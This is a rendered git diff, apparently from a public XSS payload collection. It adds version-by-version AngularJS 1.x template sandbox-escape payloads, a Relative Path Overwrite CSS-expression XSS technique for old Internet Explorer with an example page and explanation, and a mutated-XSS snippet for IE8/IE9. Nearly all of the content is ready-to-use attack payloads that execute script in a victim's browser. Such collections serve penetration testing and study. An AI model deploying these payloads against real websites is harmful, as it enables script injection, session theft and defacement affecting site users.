||||
```
|
||||
|
||||
Angular 1.5.9
|
||||
```
|
||||
{{
|
||||
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
|
||||
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
|
||||
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
|
||||
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
|
||||
B=C(b,c,b);$evalAsync("
|
||||
astNode=pop();astNode.type='UnaryExpression';
|
||||
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
|
||||
astNode.argument={type:'Identifier',name:'foo'};
|
||||
");
|
||||
m1=B($$asyncQueue.pop().expression,null,$root);
|
||||
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
|
||||
$eval('a(b.c)');[].push.apply=a;
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.5.0 - 1.5.8
|
||||
```
|
||||
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.4.0 - 1.4.9
|
||||
```
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
|
||||
```
|
||||
|
||||
Angular 1.3.20
|
||||
```
|
||||
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
|
||||
```
|
||||
|
||||
Angular 1.3.19
|
||||
```
|
||||
{{
|
||||
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
|
||||
$eval('x=alert(1)//');
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.3.3 - 1.3.18
|
||||
```
|
||||
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
'a'.constructor.prototype.charAt=[].join;
|
||||
$eval('x=alert(1)//'); }}
|
||||
```
|
||||
|
||||
Angular 1.3.1 - 1.3.2
|
||||
```
|
||||
{{
|
||||
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
|
||||
'a'.constructor.prototype.charAt=''.valueOf;
|
||||
$eval('x=alert(1)//');
|
||||
}}
|
||||
```
|
||||
|
||||
Angular 1.3.0
|
||||
```
|
||||
{{!ready && (ready = true) && (
|
||||
!call
|
||||
? $$watchers[0].get(toString.constructor.prototype)
|
||||
: (a = apply) &&
|
||||
(apply = constructor) &&
|
||||
(valueOf = call) &&
|
||||
(''+''.toString(
|
||||
'F = Function.prototype;' +
|
||||
'F.apply = F.a;' +
|
||||
'delete F.a;' +
|
||||
'delete F.valueOf;' +
|
||||
'alert(1);'
|
||||
))
|
||||
);}}
|
||||
```
|
||||
|
||||
Angular 1.2.24 - 1.2.29
|
||||
```
|
||||
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.19 - 1.2.23
|
||||
```
|
||||
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
|
||||
```
|
||||
|
||||
Angular 1.2.6 - 1.2.18
|
||||
```
|
||||
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.2.2 - 1.2.5
|
||||
```
|
||||
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
|
||||
```
|
||||
|
||||
Angular 1.2.0 - 1.2.1
|
||||
```
|
||||
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
|
||||
```
|
||||
|
||||
Angular 1.0.1 - 1.1.5
|
||||
```
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
45
XSS injection/XSS with Relative Path Overwrite.md
Normal file
45
XSS injection/XSS with Relative Path Overwrite.md
Normal file
@ -0,0 +1,45 @@
|
||||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
|
||||
You need these 3 components
|
||||
```
|
||||
1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
|
||||
2) URL Rewriting.
|
||||
3) Relative addressing to CSS style sheet : ../style.css
|
||||
|
||||
```
|
||||
|
||||
A little example
|
||||
```
|
||||
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
|
||||
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
|
||||
</head>
|
||||
<body>
|
||||
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
Explanation of the vulnerability
|
||||
```
|
||||
The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
|
||||
|
||||
A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
|
||||
|
||||
Demo 1 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php
|
||||
Demo 2 at http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3
|
||||
MultiBrowser : http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php
|
||||
|
||||
|
||||
From : http://www.thespanner.co.uk/2014/03/21/rpo/
|
||||
```
|
||||
|
||||
|
||||
## Mutated XSS for Browser IE8/IE9
|
||||
```
|
||||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||||
<script>alert(document.getElementById('x').innerHTML)</script>
|
||||
```
|
||||
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
|
Loading…
Reference in New Issue
Block a user